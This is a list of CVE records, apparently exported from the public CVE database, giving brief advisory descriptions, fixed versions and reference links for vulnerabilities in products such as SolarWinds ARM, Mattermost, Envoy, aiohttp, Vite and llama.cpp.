CVE    2024    23501    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Shopfiles Ltd Ebook Store allows Stored XSS. This issue affects Ebook Store: from n/a through 5.788.    MISC:https://patchstack.com/database/vulnerability/ebook-store/wordpress-ebook-store-plugin-5-788-cross-site-scripting-xss-vulnerability?_s_id=cve   |   URL:https://patchstack.com/database/vulnerability/ebook-store/wordpress-ebook-store-plugin-5-788-cross-site-scripting-xss-vulnerability?_s_id=cve    Assigned (20240117)
CVE    2024    23496    Candidate    A heap-based buffer overflow vulnerability exists in the GGUF library gguf_fread_str functionality of llama.cpp Commit 18c2e17. A specially crafted .gguf file can lead to code execution. An attacker can provide a malicious file to trigger this vulnerability.    MISC:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1913   |   URL:https://talosintelligence.com/vulnerability_reports/TALOS-2024-1913    Assigned (20240118)
CVE    2024    23494    Candidate    SQL injection vulnerability exists in GetDIAE_unListParameters.    MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12    Assigned (20240312)
CVE    2024    23493    Candidate    Mattermost fails to properly authorize the requests fetching team associated AD/LDAP groups, allowing a user to fetch details of AD/LDAP groups of a team that they are not a member of.    MISC:https://mattermost.com/security-updates   |   URL:https://mattermost.com/security-updates    Assigned (20240226)
CVE    2024    23492    Candidate    A weak encoding is used to transmit credentials for WS203VICM.    MISC:https://clibrary-online.commend.com/en/cyber-security/security-advisories.html   |   URL:https://clibrary-online.commend.com/en/cyber-security/security-advisories.html   |   MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-051-01   |   URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-051-01    Assigned (20240130)
CVE    2024    23488    Candidate    Mattermost fails to properly restrict the access of files attached to posts in an archived channel, resulting in members being able to access files of archived channels even if the “Allow users to view archived channels” option is disabled.    MISC:https://mattermost.com/security-updates   |   URL:https://mattermost.com/security-updates    Assigned (20240226)
CVE    2024    23479    Candidate    SolarWinds Access Rights Manager (ARM) was found to be susceptible to a Directory Traversal Remote Code Execution Vulnerability. If exploited, this vulnerability allows an unauthenticated user to achieve a Remote Code Execution.    MISC:https://www.solarwinds.com/trust-center/security-advisories/CVE-2024-23479   |   URL:https://www.solarwinds.com/trust-center/security-advisories/CVE-2024-23479    Assigned (20240117)
CVE    2024    23478    Candidate    SolarWinds Access Rights Manager (ARM) was found to be susceptible to a Remote Code Execution Vulnerability. If exploited, this vulnerability allows an authenticated user to abuse a SolarWinds service, resulting in remote code execution.    MISC:https://www.solarwinds.com/trust-center/security-advisories/CVE-2024-23478   |   URL:https://www.solarwinds.com/trust-center/security-advisories/CVE-2024-23478    Assigned (20240117)
CVE    2024    23477    Candidate    The SolarWinds Access Rights Manager (ARM) was found to be susceptible to a Directory Traversal Remote Code Execution Vulnerability. If exploited, this vulnerability allows an unauthenticated user to achieve a Remote Code Execution.    MISC:https://www.solarwinds.com/trust-center/security-advisories/CVE-2024-23477   |   URL:https://www.solarwinds.com/trust-center/security-advisories/CVE-2024-23477    Assigned (20240117)
CVE    2024    23476    Candidate    The SolarWinds Access Rights Manager (ARM) was found to be susceptible to a Directory Traversal Remote Code Execution Vulnerability. If exploited, this vulnerability allows an unauthenticated user to achieve the Remote Code Execution.    MISC:https://www.solarwinds.com/trust-center/security-advisories/CVE-2024-23476   |   URL:https://www.solarwinds.com/trust-center/security-advisories/CVE-2024-23476    Assigned (20240117)
CVE    2024    23453    Candidate    Android Spoon application version 7.11.1 to 8.6.0 uses hard-coded credentials, which may allow a local attacker to retrieve the hard-coded API key when the application binary is reverse-engineered. This API key may be used for unexpected access of the associated service.    MISC:https://jvn.jp/en/jp/JVN96154238/   |   URL:https://jvn.jp/en/jp/JVN96154238/   |   MISC:https://play.google.com/store/apps/details?id=co.spoonme&hl=en_US   |   URL:https://play.google.com/store/apps/details?id=co.spoonme&hl=en_US   |   MISC:https://spoon-support.spooncast.net/jp/update   |   URL:https://spoon-support.spooncast.net/jp/update    Assigned (20240117)
CVE    2024    23452    Candidate    Request smuggling vulnerability in HTTP server in Apache bRPC 0.9.5~1.7.0 on all platforms allows attacker to smuggle request. Vulnerability Cause Description: The http_parser does not comply with the RFC-7230 HTTP 1.1 specification. Attack scenario: If a message is received with both a Transfer-Encoding and a Content-Length header field, such a message might indicate an attempt to perform request smuggling or response splitting. One particular attack scenario is that a bRPC made http server on the backend receiving requests in one persistent connection from frontend server that uses TE to parse request with the logic that 'chunk' is contained in the TE field. In that case an attacker can smuggle a request into the connection to the backend server. Solution: You can choose one solution from below: 1. Upgrade bRPC to version 1.8.0, which fixes this issue. Download link: https://github.com/apache/brpc/releases/tag/1.8.0 2. Apply this patch: https://github.com/apache/brpc/pull/2518    MISC:https://github.com/apache/brpc/pull/2518   |   URL:https://github.com/apache/brpc/pull/2518   |   MISC:https://github.com/apache/brpc/releases/tag/1.8.0   |   URL:https://github.com/apache/brpc/releases/tag/1.8.0   |   MISC:https://lists.apache.org/thread/kkvdpwyr2s2yt9qvvxfdzon012898vxd   |   URL:https://lists.apache.org/thread/kkvdpwyr2s2yt9qvvxfdzon012898vxd   |   MLIST:[oss-security] 20240208 CVE-2024-23452: Apache bRPC: HTTP request smuggling vulnerability   |   URL:http://www.openwall.com/lists/oss-security/2024/02/08/1    Assigned (20240117)
CVE    2024    23448    Candidate    An issue was discovered whereby APM Server could log at ERROR level, a response from Elasticsearch indicating that indexing the document failed and that response would contain parts of the original document. Depending on the nature of the document that the APM Server attempted to ingest, this could lead to the insertion of sensitive or private information in the APM Server logs.    MISC:https://discuss.elastic.co/t/apm-server-8-12-1-security-update-esa-2024-03/352688   |   URL:https://discuss.elastic.co/t/apm-server-8-12-1-security-update-esa-2024-03/352688   |   MISC:https://www.elastic.co/community/security   |   URL:https://www.elastic.co/community/security    Assigned (20240116)
CVE    2024    23447    Candidate    An issue was discovered in the Windows Network Drive Connector when using Document Level Security to assign permissions to a file, with explicit allow write and deny read. Although the document is not accessible to the user in Network Drive it is visible in search applications to the user.    MISC:https://discuss.elastic.co/t/elastic-network-drive-connector-8-12-1-security-update-esa-2024-02/352687   |   URL:https://discuss.elastic.co/t/elastic-network-drive-connector-8-12-1-security-update-esa-2024-02/352687   |   MISC:https://www.elastic.co/community/security   |   URL:https://www.elastic.co/community/security    Assigned (20240116)
CVE    2024    23446    Candidate    An issue was discovered by Elastic, whereby the Detection Engine Search API does not respect Document-level security (DLS) or Field-level security (FLS) when querying the .alerts-security.alerts-{space_id} indices. Users who are authorized to call this API may obtain unauthorized access to documents if their roles are configured with DLS or FLS against the aforementioned index.    MISC:https://discuss.elastic.co/t/kibana-8-12-1-security-update-esa-2024-01/352686   |   URL:https://discuss.elastic.co/t/kibana-8-12-1-security-update-esa-2024-01/352686   |   MISC:https://www.elastic.co/community/security   |   URL:https://www.elastic.co/community/security    Assigned (20240116)
CVE    2024    23441    Candidate    Vba32 Antivirus v3.36.0 is vulnerable to a Denial of Service vulnerability by triggering the 0x2220A7 IOCTL code of the Vba32m64.sys driver.    MISC:https://fluidattacks.com/advisories/rollins/   |   URL:https://fluidattacks.com/advisories/rollins/   |   MISC:https://www.anti-virus.by/vba32   |   URL:https://www.anti-virus.by/vba32    Assigned (20240116)
CVE    2024    23440    Candidate    Vba32 Antivirus v3.36.0 is vulnerable to an Arbitrary Memory Read vulnerability. The 0x22200B IOCTL code of the Vba32m64.sys driver allows to read up to 0x802 of memory from an arbitrary user-supplied pointer.    MISC:https://fluidattacks.com/advisories/adderley/   |   URL:https://fluidattacks.com/advisories/adderley/   |   MISC:https://www.anti-virus.by/vba32   |   URL:https://www.anti-virus.by/vba32    Assigned (20240116)
CVE    2024    23439    Candidate    Vba32 Antivirus v3.36.0 is vulnerable to an Arbitrary Memory Read vulnerability by triggering the 0x22201B, 0x22201F, 0x222023, 0x222027, 0x22202B, 0x22202F, 0x22203F, 0x222057 and 0x22205B IOCTL codes of the Vba32m64.sys driver.    MISC:https://fluidattacks.com/advisories/adderley/   |   URL:https://fluidattacks.com/advisories/adderley/   |   MISC:https://www.anti-virus.by/vba32   |   URL:https://www.anti-virus.by/vba32    Assigned (20240116)
CVE    2024    2339    Candidate    PostgreSQL Anonymizer v1.2 contains a vulnerability that allows a user who owns a table to elevate to superuser. A user can define a masking function for a column and place malicious code in that function. When a privileged user applies the masking rules using the static masking or the anonymous dump method, the malicious code is executed and can grant escalated privileges to the malicious user. PostgreSQL Anonymizer v1.2 does provide a protection against this risk with the restrict_to_trusted_schemas option, but that protection is incomplete. Users that don't own a table, especially masked users cannot exploit this vulnerability. The problem is resolved in v1.3.    MISC:https://gitlab.com/dalibo/postgresql_anonymizer/-/commit/e517b38e62e50871b04011598e73a7308bdae9d9   |   URL:https://gitlab.com/dalibo/postgresql_anonymizer/-/commit/e517b38e62e50871b04011598e73a7308bdae9d9    Assigned (20240308)
CVE    2024    23388    Candidate    Improper authorization in handler for custom URL scheme issue in "Mercari" App for Android prior to version 5.78.0 allows a remote attacker to lead a user to access an arbitrary website via the vulnerable App. As a result, the user may become a victim of a phishing attack.    MISC:https://jvn.jp/en/jp/JVN70818619/   |   URL:https://jvn.jp/en/jp/JVN70818619/    Assigned (20240116)
CVE    2024    23387    Candidate    FusionPBX prior to 5.1.0 contains a cross-site scripting vulnerability. If this vulnerability is exploited by a remote authenticated attacker with an administrative privilege, an arbitrary script may be executed on the web browser of the user who is logging in to the product.    MISC:https://github.com/fusionpbx/fusionpbx/   |   URL:https://github.com/fusionpbx/fusionpbx/   |   MISC:https://jvn.jp/en/jp/JVN67215338/   |   URL:https://jvn.jp/en/jp/JVN67215338/   |   MISC:https://www.fusionpbx.com/   |   URL:https://www.fusionpbx.com/    Assigned (20240116)
CVE    2024    2338    Candidate    PostgreSQL Anonymizer v1.2 contains a SQL injection vulnerability that allows a user who owns a table to elevate to superuser when dynamic masking is enabled. PostgreSQL Anonymizer enables users to set security labels on tables to mask specified columns. There is a flaw that allows complex expressions to be provided as a value. This expression is then later used as is to create the masked views leading to SQL Injection. If dynamic masking is enabled, this will lead to privilege escalation to superuser after the label is created. Users that don't own a table, especially masked users cannot exploit this vulnerability. The problem is resolved in v1.3.    MISC:https://gitlab.com/dalibo/postgresql_anonymizer/-/commit/f55daadba3fa8226029687964aa8889d01a79778   |   URL:https://gitlab.com/dalibo/postgresql_anonymizer/-/commit/f55daadba3fa8226029687964aa8889d01a79778    Assigned (20240308)
CVE    2024    23349    Candidate    Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Answer. This issue affects Apache Answer: through 1.2.1. XSS attack when user enters summary. A logged-in user, when modifying their own submitted question, can input malicious code in the summary to create such an attack. Users are recommended to upgrade to version [1.2.5], which fixes the issue.    MISC:https://lists.apache.org/thread/y5902t09vfgy7892z3vzr1zq900sgyqg   |   URL:https://lists.apache.org/thread/y5902t09vfgy7892z3vzr1zq900sgyqg   |   MLIST:[oss-security] 20240222 CVE-2024-23349: Apache Answer: XSS vulnerability when submitting summary   |   URL:http://www.openwall.com/lists/oss-security/2024/02/22/2    Assigned (20240116)
CVE    2024    23348    Candidate    Improper input validation vulnerability in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier allows a remote authenticated attacker to execute arbitrary JavaScript code by uploading a specially crafted SVG file.    MISC:https://developer.a-blogcms.jp/blog/news/JVN-34565930.html   |   URL:https://developer.a-blogcms.jp/blog/news/JVN-34565930.html   |   MISC:https://jvn.jp/en/jp/JVN34565930/   |   URL:https://jvn.jp/en/jp/JVN34565930/    Assigned (20240115)
CVE    2024    23347    Candidate    Prior to v176, when opening a new project Meta Spark Studio would execute scripts defined inside of a package.json file included as part of that project. Those scripts would have the ability to execute arbitrary code on the system as the application.    MISC:https://www.facebook.com/security/advisories/cve-2024-23347   |   URL:https://www.facebook.com/security/advisories/cve-2024-23347    Assigned (20240115)
CVE    2024    23346    Candidate    Pymatgen (Python Materials Genomics) is an open-source Python library for materials analysis. A critical security vulnerability exists in the `JonesFaithfulTransformation.from_transformation_str()` method within the `pymatgen` library prior to version 2024.2.20. This method insecurely utilizes `eval()` for processing input, enabling execution of arbitrary code when parsing untrusted input. Version 2024.2.20 fixes this issue.    MISC:https://github.com/materialsproject/pymatgen/blob/master/pymatgen/symmetry/settings.py#L97C1-L111C108   |   URL:https://github.com/materialsproject/pymatgen/blob/master/pymatgen/symmetry/settings.py#L97C1-L111C108   |   MISC:https://github.com/materialsproject/pymatgen/commit/c231cbd3d5147ee920a37b6ee9dd236b376bcf5a   |   URL:https://github.com/materialsproject/pymatgen/commit/c231cbd3d5147ee920a37b6ee9dd236b376bcf5a   |   MISC:https://github.com/materialsproject/pymatgen/security/advisories/GHSA-vgv8-5cpj-qj2f   |   URL:https://github.com/materialsproject/pymatgen/security/advisories/GHSA-vgv8-5cpj-qj2f    Assigned (20240115)
CVE    2024    23345    Candidate    Nautobot is a Network Source of Truth and Network Automation Platform built as a web application. All users of Nautobot versions earlier than 1.6.10 or 2.1.2 are potentially impacted by a cross-site scripting vulnerability. Due to inadequate input sanitization, any user-editable fields that support Markdown rendering, including are potentially susceptible to cross-site scripting (XSS) attacks via maliciously crafted data. This issue is fixed in Nautobot versions 1.6.10 and 2.1.2.    MISC:https://github.com/nautobot/nautobot/commit/17effcbe84a72150c82b138565c311bbee357e80   |   URL:https://github.com/nautobot/nautobot/commit/17effcbe84a72150c82b138565c311bbee357e80   |   MISC:https://github.com/nautobot/nautobot/commit/64312a4297b5ca49b6cdedf477e41e8e4fd61cce   |   URL:https://github.com/nautobot/nautobot/commit/64312a4297b5ca49b6cdedf477e41e8e4fd61cce   |   MISC:https://github.com/nautobot/nautobot/pull/5133   |   URL:https://github.com/nautobot/nautobot/pull/5133   |   MISC:https://github.com/nautobot/nautobot/pull/5134   |   URL:https://github.com/nautobot/nautobot/pull/5134   |   MISC:https://github.com/nautobot/nautobot/security/advisories/GHSA-v4xv-795h-rv4h   |   URL:https://github.com/nautobot/nautobot/security/advisories/GHSA-v4xv-795h-rv4h    Assigned (20240115)
CVE    2024    23344    Candidate    Tuleap is an Open Source Suite to improve management of software developments and collaboration. Some users might get access to restricted information when a process validates the permissions of multiple users (e.g. mail notifications). This issue has been patched in version 15.4.99.140 of Tuleap Community Edition.    MISC:https://github.com/Enalean/tuleap/commit/0329e21d268510bc00fed707406103edabf10e42   |   URL:https://github.com/Enalean/tuleap/commit/0329e21d268510bc00fed707406103edabf10e42   |   MISC:https://github.com/Enalean/tuleap/security/advisories/GHSA-m3v5-2j5q-x85w   |   URL:https://github.com/Enalean/tuleap/security/advisories/GHSA-m3v5-2j5q-x85w   |   MISC:https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&h=0329e21d268510bc00fed707406103edabf10e42   |   URL:https://tuleap.net/plugins/git/tuleap/tuleap/stable?a=commit&h=0329e21d268510bc00fed707406103edabf10e42   |   MISC:https://tuleap.net/plugins/tracker/?aid=35862   |   URL:https://tuleap.net/plugins/tracker/?aid=35862    Assigned (20240115)
CVE    2024    23342    Candidate    The `ecdsa` PyPI package is a pure Python implementation of ECC (Elliptic Curve Cryptography) with support for ECDSA (Elliptic Curve Digital Signature Algorithm), EdDSA (Edwards-curve Digital Signature Algorithm) and ECDH (Elliptic Curve Diffie-Hellman). Versions 0.18.0 and prior are vulnerable to the Minerva attack. As of time of publication, no known patched version exists.    MISC:https://github.com/tlsfuzzer/python-ecdsa/blob/master/SECURITY.md   |   URL:https://github.com/tlsfuzzer/python-ecdsa/blob/master/SECURITY.md   |   MISC:https://github.com/tlsfuzzer/python-ecdsa/security/advisories/GHSA-wj6h-64fc-37mp   |   URL:https://github.com/tlsfuzzer/python-ecdsa/security/advisories/GHSA-wj6h-64fc-37mp   |   MISC:https://minerva.crocs.fi.muni.cz/   |   URL:https://minerva.crocs.fi.muni.cz/   |   MISC:https://securitypitfalls.wordpress.com/2018/08/03/constant-time-compare-in-python/   |   URL:https://securitypitfalls.wordpress.com/2018/08/03/constant-time-compare-in-python/    Assigned (20240115)
CVE    2024    23341    Candidate    TuiTse-TsuSin is a package for organizing the comparative corpus of Taiwanese Chinese characters and Roman characters, and extracting sentences of the Taiwanese Chinese characters and the Roman characters. Prior to version 1.3.2, when using `tuitse_html` without quoting the input, there is a html injection vulnerability. Version 1.3.2 contains a patch for the issue. As a workaround, sanitize Taigi input with HTML quotation.    MISC:https://github.com/i3thuan5/TuiTse-TsuSin/commit/9d21d99d7cfcd7c42aade251fab98ec102e730ea   |   URL:https://github.com/i3thuan5/TuiTse-TsuSin/commit/9d21d99d7cfcd7c42aade251fab98ec102e730ea   |   MISC:https://github.com/i3thuan5/TuiTse-TsuSin/pull/22   |   URL:https://github.com/i3thuan5/TuiTse-TsuSin/pull/22   |   MISC:https://github.com/i3thuan5/TuiTse-TsuSin/security/advisories/GHSA-m4m5-j36m-8x72   |   URL:https://github.com/i3thuan5/TuiTse-TsuSin/security/advisories/GHSA-m4m5-j36m-8x72    Assigned (20240115)
CVE    2024    23340    Candidate    @hono/node-server is an adapter that allows users to run Hono applications on Node.js. Since v1.3.0, @hono/node-server has used its own Request object with `url` behavior that is unexpected. In the standard API, if the URL contains `..`, here called "double dots", the URL string returned by Request will be in the resolved path. However, the `url` in @hono/node-server's Request does not resolve double dots, so `http://localhost/static/.. /foo.txt` is returned. This causes vulnerabilities when using `serveStatic`. Modern web browsers and the latest `curl` command resolve double dots on the client side, so this issue doesn't affect those using either of those tools. However, problems may occur if accessed by a client that does not resolve them. Version 1.4.1 includes the change to fix this issue. As a workaround, don't use `serveStatic`.    MISC:https://github.com/honojs/node-server/blob/8cea466fd05e6d2e99c28011fc0e2c2d3f3397c9/src/request.ts#L43-L45   |   URL:https://github.com/honojs/node-server/blob/8cea466fd05e6d2e99c28011fc0e2c2d3f3397c9/src/request.ts#L43-L45   |   MISC:https://github.com/honojs/node-server/commit/dd9b9a9b23e3896403c90a740e7f1f0892feb402   |   URL:https://github.com/honojs/node-server/commit/dd9b9a9b23e3896403c90a740e7f1f0892feb402   |   MISC:https://github.com/honojs/node-server/security/advisories/GHSA-rjq5-w47x-x359   |   URL:https://github.com/honojs/node-server/security/advisories/GHSA-rjq5-w47x-x359    Assigned (20240115)
CVE    2024    23339    Candidate    hoolock is a suite of lightweight utilities designed to maintain a small footprint when bundled. Starting in version 2.0.0 and prior to version 2.2.1, utility functions related to object paths (`get`, `set`, and `update`) did not block attempts to access or alter object prototypes. Starting in version 2.2.1, the `get`, `set` and `update` functions throw a `TypeError` when a user attempts to access or alter inherited properties.    MISC:https://github.com/elijahharry/hoolock/commit/97ae80e856774335d92743c635ffeae2f652b982   |   URL:https://github.com/elijahharry/hoolock/commit/97ae80e856774335d92743c635ffeae2f652b982   |   MISC:https://github.com/elijahharry/hoolock/security/advisories/GHSA-4c2g-hx49-7h25   |   URL:https://github.com/elijahharry/hoolock/security/advisories/GHSA-4c2g-hx49-7h25    Assigned (20240115)
CVE    2024    23334    Candidate    aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. When using aiohttp as a web server and configuring static routes, it is necessary to specify the root path for static files. Additionally, the option 'follow_symlinks' can be used to determine whether to follow symbolic links outside the static root directory. When 'follow_symlinks' is set to True, there is no validation to check if reading a file is within the root directory. This can lead to directory traversal vulnerabilities, resulting in unauthorized access to arbitrary files on the system, even when symlinks are not present. Disabling follow_symlinks and using a reverse proxy are encouraged mitigations. Version 3.9.2 fixes this issue.    FEDORA:FEDORA-2024-0ddda4c691   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ICUOCFGTB25WUT336BZ4UNYLSZOUVKBD/   |   FEDORA:FEDORA-2024-f249b74f03   |   URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XXWVZIVAYWEBHNRIILZVB3R3SDQNNAA7/   |   MISC:https://github.com/aio-libs/aiohttp/commit/1c335944d6a8b1298baf179b7c0b3069f10c514b   |   URL:https://github.com/aio-libs/aiohttp/commit/1c335944d6a8b1298baf179b7c0b3069f10c514b   |   MISC:https://github.com/aio-libs/aiohttp/pull/8079   |   URL:https://github.com/aio-libs/aiohttp/pull/8079   |   MISC:https://github.com/aio-libs/aiohttp/security/advisories/GHSA-5h86-8mv2-jq9f   |   URL:https://github.com/aio-libs/aiohttp/security/advisories/GHSA-5h86-8mv2-jq9f    Assigned (20240115)
CVE    2024    23333    Candidate    LDAP Account Manager (LAM) is a webfrontend for managing entries stored in an LDAP directory. LAM's log configuration allows to specify arbitrary paths for log files. Prior to version 8.7, an attacker could exploit this by creating a PHP file and cause LAM to log some PHP code to this file. When the file is then accessed via web the code would be executed. The issue is mitigated by the following: An attacker needs to know LAM's master configuration password to be able to change the main settings; and the webserver needs write access to a directory that is accessible via web. LAM itself does not provide any such directories. The issue has been fixed in 8.7. As a workaround, limit access to LAM configuration pages to authorized users.    MISC:https://github.com/LDAPAccountManager/lam/releases/tag/8.7   |   URL:https://github.com/LDAPAccountManager/lam/releases/tag/8.7   |   MISC:https://github.com/LDAPAccountManager/lam/security/advisories/GHSA-fm9w-7m7v-wxqv   |   URL:https://github.com/LDAPAccountManager/lam/security/advisories/GHSA-fm9w-7m7v-wxqv    Assigned (20240115)
CVE    2024    23332    Candidate    The Notary Project is a set of specifications and tools intended to provide a cross-industry standard for securing software supply chains by using authentic container images and other OCI artifacts. An external actor with control of a compromised container registry can provide outdated versions of OCI artifacts, such as Images. This could lead artifact consumers with relaxed trust policies (such as `permissive` instead of `strict`) to potentially use artifacts with signatures that are no longer valid, making them susceptible to any exploits those artifacts may contain. In Notary Project, an artifact publisher can control the validity period of artifact by specifying signature expiry during the signing process. Using shorter signature validity periods along with processes to periodically resign artifacts, allows artifact producers to ensure that their consumers will only receive up-to-date artifacts. Artifact consumers should correspondingly use a `strict` or equivalent trust policy that enforces signature expiry. Together these steps enable use of up-to-date artifacts and safeguard against rollback attack in the event of registry compromise. The Notary Project offers various signature validation options such as `permissive`, `audit` and `skip` to support various scenarios. These scenarios include 1) situations demanding urgent workload deployment, necessitating the bypassing of expired or revoked signatures; 2) auditing of artifacts lacking signatures without interrupting workload; and 3) skipping of verification for specific images that might have undergone validation through alternative mechanisms. Additionally, the Notary Project supports revocation to ensure the signature freshness. Artifact publishers can sign with short-lived certificates and revoke older certificates when necessary. This revocation serves as a signal to inform artifact consumers that the corresponding unexpired artifact is no longer approved by the publisher. This enables the artifact publisher to control the validity of the signature independently of their ability to manage artifacts in a compromised registry.    MISC:https://github.com/notaryproject/specifications/commit/cdabdd1042de2999c685fa5d422a785ded9c983a   |   URL:https://github.com/notaryproject/specifications/commit/cdabdd1042de2999c685fa5d422a785ded9c983a   |   MISC:https://github.com/notaryproject/specifications/security/advisories/GHSA-57wx-m636-g3g8   |   URL:https://github.com/notaryproject/specifications/security/advisories/GHSA-57wx-m636-g3g8    Assigned (20240115)
CVE    2024    23331    Candidate    Vite is a frontend tooling framework for javascript. The Vite dev server option `server.fs.deny` can be bypassed on case-insensitive file systems using case-augmented versions of filenames. Notably this affects servers hosted on Windows. This bypass is similar to CVE-2023-34092 -- with surface area reduced to hosts having case-insensitive filesystems. Since `picomatch` defaults to case-sensitive glob matching, but the file server doesn't discriminate; a blacklist bypass is possible. By requesting raw filesystem paths using augmented casing, the matcher derived from `config.server.fs.deny` fails to block access to sensitive files. This issue has been addressed in vite@5.0.12, vite@4.5.2, vite@3.2.8, and vite@2.9.17. Users are advised to upgrade. Users unable to upgrade should restrict access to dev servers.    MISC:https://github.com/vitejs/vite/commit/91641c4da0a011d4c5352e88fc68389d4e1289a5   |   URL:https://github.com/vitejs/vite/commit/91641c4da0a011d4c5352e88fc68389d4e1289a5   |   MISC:https://github.com/vitejs/vite/security/advisories/GHSA-c24v-8rfc-w8vw   |   URL:https://github.com/vitejs/vite/security/advisories/GHSA-c24v-8rfc-w8vw   |   MISC:https://vitejs.dev/config/server-options.html#server-fs-deny   |   URL:https://vitejs.dev/config/server-options.html#server-fs-deny    Assigned (20240115)
CVE    2024    23330    Candidate    Tuta is an encrypted email service. In versions prior to 119.10, an attacker can attach an image in a html mail which is loaded from external resource in the default setting, which should prevent loading of external resources. When displaying emails containing external content, they should be loaded by default only after confirmation by the user. However, it could be recognized that certain embedded images (see PoC) are loaded, even though the "Automatic Reloading of Images" function is disabled by default. The reloading is also done unencrypted via HTTP and redirections are followed. This behavior is unexpected for the user, since the user assumes that external content will only be loaded after explicit manual confirmation. The loading of external content in e-mails represents a risk, because this makes the sender aware that the e-mail address is used, when the e-mail was read, which device is used and expose the user's IP address. Version 119.10 contains a patch for this issue.    MISC:https://github.com/tutao/tutanota/security/advisories/GHSA-32w8-v5fc-vpp7   |   URL:https://github.com/tutao/tutanota/security/advisories/GHSA-32w8-v5fc-vpp7    Assigned (20240115)
CVE    2024    2333    Candidate    A vulnerability classified as critical has been found in CodeAstro Membership Management System 1.0. Affected is an unknown function of the file /add_members.php. The manipulation of the argument fullname leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-256284.    MISC:VDB-256284 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.256284   |   MISC:VDB-256284 | CodeAstro Membership Management System add_members.php sql injection   |   URL:https://vuldb.com/?id.256284   |   MISC:https://github.com/0x404Ming/CVE_Hunter/blob/main/SQLi-3.md   |   URL:https://github.com/0x404Ming/CVE_Hunter/blob/main/SQLi-3.md    Assigned (20240308)
CVE    2024    23329    Candidate    changedetection.io is an open source tool designed to monitor websites for content changes. In affected versions the API endpoint `/api/v1/watch/<uuid>/history` can be accessed by any unauthorized user. As a result any unauthorized user can check one's watch history. However, because unauthorized party first needs to know a watch UUID, and the watch history endpoint itself returns only paths to the snapshot on the server, an impact on users' data privacy is minimal. This issue has been addressed in version 0.45.13. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/dgtlmoon/changedetection.io/commit/402f1e47e78ecd155b1e90f30cce424ff7763e0f   |   URL:https://github.com/dgtlmoon/changedetection.io/commit/402f1e47e78ecd155b1e90f30cce424ff7763e0f   |   MISC:https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-hcvp-2cc7-jrwr   |   URL:https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-hcvp-2cc7-jrwr    Assigned (20240115)
CVE    2024    23328    Candidate    Dataease is an open source data visualization analysis tool. A deserialization vulnerability exists in the DataEase datasource, which can be exploited to execute arbitrary code. The location of the vulnerability code is `core/core-backend/src/main/java/io/dataease/datasource/type/Mysql.java.` The blacklist of mysql jdbc attacks can be bypassed and attackers can further exploit it for deserialized execution or reading arbitrary files. This vulnerability is patched in 1.18.15 and 2.3.0.    MISC:https://github.com/dataease/dataease/commit/4128adf5fc4592b55fa1722a53b178967545d46a   |   URL:https://github.com/dataease/dataease/commit/4128adf5fc4592b55fa1722a53b178967545d46a   |   MISC:https://github.com/dataease/dataease/commit/bb540e6dc83df106ac3253f331066129a7487d1a   |   URL:https://github.com/dataease/dataease/commit/bb540e6dc83df106ac3253f331066129a7487d1a   |   MISC:https://github.com/dataease/dataease/security/advisories/GHSA-8x8q-p622-jf25   |   URL:https://github.com/dataease/dataease/security/advisories/GHSA-8x8q-p622-jf25    Assigned (20240115)
CVE    2024    23327    Candidate    Envoy is a high-performance edge/middle/service proxy. When PPv2 is enabled both on a listener and subsequent cluster, the Envoy instance will segfault when attempting to craft the upstream PPv2 header. This occurs when the downstream request has a command type of LOCAL and does not have the protocol block. This issue has been addressed in releases 1.29.1, 1.28.1, 1.27.3, and 1.26.7. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/envoyproxy/envoy/commit/63895ea8e3cca9c5d3ab4c5c128ed1369969d54a   |   URL:https://github.com/envoyproxy/envoy/commit/63895ea8e3cca9c5d3ab4c5c128ed1369969d54a   |   MISC:https://github.com/envoyproxy/envoy/security/advisories/GHSA-4h5x-x9vh-m29j   |   URL:https://github.com/envoyproxy/envoy/security/advisories/GHSA-4h5x-x9vh-m29j    Assigned (20240115)
CVE    2024    23325    Candidate    Envoy is a high-performance edge/middle/service proxy. Envoy crashes in Proxy protocol when using an address type that isn’t supported by the OS. Envoy is susceptible to crashing on a host with IPv6 disabled and a listener config with proxy protocol enabled when it receives a request where the client presents its IPv6 address. It is valid for a client to present its IPv6 address to a target server even though the whole chain is connected via IPv4. This issue has been addressed in releases 1.29.1, 1.28.1, 1.27.3, and 1.26.7. Users are advised to upgrade. There are no known workarounds for this vulnerability.    MISC:https://github.com/envoyproxy/envoy/commit/bacd3107455b8d387889467725eb72aa0d5b5237   |   URL:https://github.com/envoyproxy/envoy/commit/bacd3107455b8d387889467725eb72aa0d5b5237   |   MISC:https://github.com/envoyproxy/envoy/security/advisories/GHSA-5m7c-mrwr-pm26   |   URL:https://github.com/envoyproxy/envoy/security/advisories/GHSA-5m7c-mrwr-pm26    Assigned (20240115)
